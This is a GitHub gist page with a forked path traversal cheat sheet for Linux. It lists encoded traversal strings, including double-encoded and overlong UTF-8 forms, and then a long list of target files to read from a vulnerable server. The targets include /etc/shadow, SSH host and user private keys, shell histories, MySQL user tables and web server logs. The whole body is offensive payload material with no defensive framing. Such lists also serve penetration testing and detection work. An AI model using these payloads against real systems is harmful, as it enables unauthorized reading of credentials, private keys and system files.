Forked from SleepyLctl/Linux Path Traversal Cheatsheet
Created
November 4, 2023 18:57
-
-
Save enkr1/1267b4b9fc0eab943bcc53c550f64cd6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Encoded Traversal Strings: | |
../ | |
..\ | |
..\/ | |
%2e%2e%2f | |
%252e%252e%252f | |
%c0%ae%c0%ae%c0%af | |
%uff0e%uff0e%u2215 | |
%uff0e%uff0e%u2216 | |
..././ | |
...\.\ | |
File Disclosure Cheat Sheet | |
/etc/passwd | |
/etc/shadow | |
/etc/aliases | |
/etc/anacrontab | |
/etc/apache2/apache2.conf | |
/etc/apache2/httpd.conf | |
/etc/at.allow | |
/etc/at.deny | |
/etc/bashrc | |
/etc/bootptab | |
/etc/chrootUsers | |
/etc/chttp.conf | |
/etc/cron.allow | |
/etc/cron.deny | |
/etc/crontab | |
/etc/cups/cupsd.conf | |
/etc/exports | |
/etc/fstab | |
/etc/ftpaccess | |
/etc/ftpchroot | |
/etc/ftphosts | |
/etc/groups | |
/etc/grub.conf | |
/etc/hosts | |
/etc/hosts.allow | |
/etc/hosts.deny | |
/etc/httpd/access.conf | |
/etc/httpd/conf/httpd.conf | |
/etc/httpd/httpd.conf | |
/etc/httpd/logs/access_log | |
/etc/httpd/logs/access.log | |
/etc/httpd/logs/error_log | |
/etc/httpd/logs/error.log | |
/etc/httpd/php.ini | |
/etc/httpd/srm.conf | |
/etc/inetd.conf | |
/etc/inittab | |
/etc/issue | |
/etc/lighttpd.conf | |
/etc/lilo.conf | |
/etc/logrotate.d/ftp | |
/etc/logrotate.d/proftpd | |
/etc/logrotate.d/vsftpd.log | |
/etc/lsb-release | |
/etc/motd | |
/etc/modules.conf | |
/etc/motd | |
/etc/mtab | |
/etc/my.cnf | |
/etc/my.conf | |
/etc/mysql/my.cnf | |
/etc/network/interfaces | |
/etc/networks | |
/etc/npasswd | |
/etc/passwd | |
/etc/php4.4/fcgi/php.ini | |
/etc/php4/apache2/php.ini | |
/etc/php4/apache/php.ini | |
/etc/php4/cgi/php.ini | |
/etc/php4/apache2/php.ini | |
/etc/php5/apache2/php.ini | |
/etc/php5/apache/php.ini | |
/etc/php/apache2/php.ini | |
/etc/php/apache/php.ini | |
/etc/php/cgi/php.ini | |
/etc/php.ini | |
/etc/php/php4/php.ini | |
/etc/php/php.ini | |
/etc/printcap | |
/etc/profile | |
/etc/proftp.conf | |
/etc/proftpd/proftpd.conf | |
/etc/pure-ftpd.conf | |
/etc/pureftpd.passwd | |
/etc/pureftpd.pdb | |
/etc/pure-ftpd/pure-ftpd.conf | |
/etc/pure-ftpd/pure-ftpd.pdb | |
/etc/pure-ftpd/putreftpd.pdb | |
/etc/redhat-release | |
/etc/resolv.conf | |
/etc/samba/smb.conf | |
/etc/snmpd.conf | |
/etc/ssh/ssh_config | |
/etc/ssh/sshd_config | |
/etc/ssh/ssh_host_dsa_key | |
/etc/ssh/ssh_host_dsa_key.pub | |
/etc/ssh/ssh_host_key | |
/etc/ssh/ssh_host_key.pub | |
/etc/sysconfig/network | |
/etc/syslog.conf | |
/etc/termcap | |
/etc/vhcs2/proftpd/proftpd.conf | |
/etc/vsftpd.chroot_list | |
/etc/vsftpd.conf | |
/etc/vsftpd/vsftpd.conf | |
/etc/wu-ftpd/ftpaccess | |
/etc/wu-ftpd/ftphosts | |
/etc/wu-ftpd/ftpusers | |
/logs/pure-ftpd.log | |
/logs/security_debug_log | |
/logs/security_log | |
/opt/lampp/etc/httpd.conf | |
/opt/xampp/etc/php.ini | |
/proc/cpuinfo | |
/proc/filesystems | |
/proc/interrupts | |
/proc/ioports | |
/proc/meminfo | |
/proc/modules | |
/proc/mounts | |
/proc/stat | |
/proc/swaps | |
/proc/version | |
/proc/self/net/arp | |
/root/anaconda-ks.cfg | |
/usr/etc/pure-ftpd.conf | |
/usr/lib/php.ini | |
/usr/lib/php/php.ini | |
/usr/local/apache/conf/modsec.conf | |
/usr/local/apache/conf/php.ini | |
/usr/local/apache/log | |
/usr/local/apache/logs | |
/usr/local/apache/logs/access_log | |
/usr/local/apache/logs/access.log | |
/usr/local/apache/audit_log | |
/usr/local/apache/error_log | |
/usr/local/apache/error.log | |
/usr/local/cpanel/logs | |
/usr/local/cpanel/logs/access_log | |
/usr/local/cpanel/logs/error_log | |
/usr/local/cpanel/logs/license_log | |
/usr/local/cpanel/logs/login_log | |
/usr/local/cpanel/logs/stats_log | |
/usr/local/etc/httpd/logs/access_log | |
/usr/local/etc/httpd/logs/error_log | |
/usr/local/etc/php.ini | |
/usr/local/etc/pure-ftpd.conf | |
/usr/local/etc/pureftpd.pdb | |
/usr/local/lib/php.ini | |
/usr/local/php4/httpd.conf | |
/usr/local/php4/httpd.conf.php | |
/usr/local/php4/lib/php.ini | |
/usr/local/php5/httpd.conf | |
/usr/local/php5/httpd.conf.php | |
/usr/local/php5/lib/php.ini | |
/usr/local/php/httpd.conf | |
/usr/local/php/httpd.conf.ini | |
/usr/local/php/lib/php.ini | |
/usr/local/pureftpd/etc/pure-ftpd.conf | |
/usr/local/pureftpd/etc/pureftpd.pdn | |
/usr/local/pureftpd/sbin/pure-config.pl | |
/usr/local/www/logs/httpd_log | |
/usr/local/Zend/etc/php.ini | |
/usr/sbin/pure-config.pl | |
/var/adm/log/xferlog | |
/var/apache2/config.inc | |
/var/apache/logs/access_log | |
/var/apache/logs/error_log | |
/var/cpanel/cpanel.config | |
/var/lib/mysql/my.cnf | |
/var/lib/mysql/mysql/user.MYD | |
/var/local/www/conf/php.ini | |
/var/log/apache2/access_log | |
/var/log/apache2/access.log | |
/var/log/apache2/error_log | |
/var/log/apache2/error.log | |
/var/log/apache/access_log | |
/var/log/apache/access.log | |
/var/log/apache/error_log | |
/var/log/apache/error.log | |
/var/log/apache-ssl/access.log | |
/var/log/apache-ssl/error.log | |
/var/log/auth.log | |
/var/log/boot | |
/var/htmp | |
/var/log/chttp.log | |
/var/log/cups/error.log | |
/var/log/daemon.log | |
/var/log/debug | |
/var/log/dmesg | |
/var/log/dpkg.log | |
/var/log/exim_mainlog | |
/var/log/exim/mainlog | |
/var/log/exim_paniclog | |
/var/log/exim.paniclog | |
/var/log/exim_rejectlog | |
/var/log/exim/rejectlog | |
/var/log/faillog | |
/var/log/ftplog | |
/var/log/ftp-proxy | |
/var/log/ftp-proxy/ftp-proxy.log | |
/var/log/httpd/access_log | |
/var/log/httpd/access.log | |
/var/log/httpd/error_log | |
/var/log/httpd/error.log | |
/var/log/httpsd/ssl.access_log | |
/var/log/httpsd/ssl_log | |
/var/log/kern.log | |
/var/log/lastlog | |
/var/log/lighttpd/access.log | |
/var/log/lighttpd/error.log | |
/var/log/lighttpd/lighttpd.access.log | |
/var/log/lighttpd/lighttpd.error.log | |
/var/log/mail.info | |
/var/log/mail.log | |
/var/log/maillog | |
/var/log/mail.warn | |
/var/log/message | |
/var/log/messages | |
/var/log/mysqlderror.log | |
/var/log/mysql.log | |
/var/log/mysql/mysql-bin.log | |
/var/log/mysql/mysql.log | |
/var/log/mysql/mysql-slow.log | |
/var/log/proftpd | |
/var/log/pureftpd.log | |
/var/log/pure-ftpd/pure-ftpd.log | |
/var/log/secure | |
/var/log/vsftpd.log | |
/var/log/wtmp | |
/var/log/xferlog | |
/var/log/yum.log | |
/var/mysql.log | |
/var/run/utmp | |
/var/spool/cron/crontabs/root | |
/var/webmin/miniserv.log | |
/var/www/log/access_log | |
/var/www/log/error_log | |
/var/www/logs/access_log | |
/var/www/logs/error_log | |
/var/www/logs/access.log | |
/var/www/logs/error.log | |
~/.atfp_history | |
~/.bash_history | |
~/.bash_logout | |
~/.bash_profile | |
~/.bashrc | |
~/.gtkrc | |
~/.login | |
~/.logout | |
~/.mysql_history | |
~/.nano_history | |
~/.php_history | |
~/.profile | |
~/.ssh/authorized_keys | |
~/.ssh/id_dsa | |
~/.ssh/id_dsa.pub | |
~/.ssh/id_rsa | |
~/.ssh/id_rsa.pub | |
~/.ssh/identity | |
~/.ssh/identity.pub | |
~/.viminfo | |
~/.wm_style | |
~/.Xdefaults | |
~/.xinitrc | |
~/.Xresources | |
~/.xsession | |
Oh, and one last thing, take a look at this path on a Linux box: | |
/proc/<int>/fd/<int> | |
e.g. | |
/proc/2116/fd/11 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment